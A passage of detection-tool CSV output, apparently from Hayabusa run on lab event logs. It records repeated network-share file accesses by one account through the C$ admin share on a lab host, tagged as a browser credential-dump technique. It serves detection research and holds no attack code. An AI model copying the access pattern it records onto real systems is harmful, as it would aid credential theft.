+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.623 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.641 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.642 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.642 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.642 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.692 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.692 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.692 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.707 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.707 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.707 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.723 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.723 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.739 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.739 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.754 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.754 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.754 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.770 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.770 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.770 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.785 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.785 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.801 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.801 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.817 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.817 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.817 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.832 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.832 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.832 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.848 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.848 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.848 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.864 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.864 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.864 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.880 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.880 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.880 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.895 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.895 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.895 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.911 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.911 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.911 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.926 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.926 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.926 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.942 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.942 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.957 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.957 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 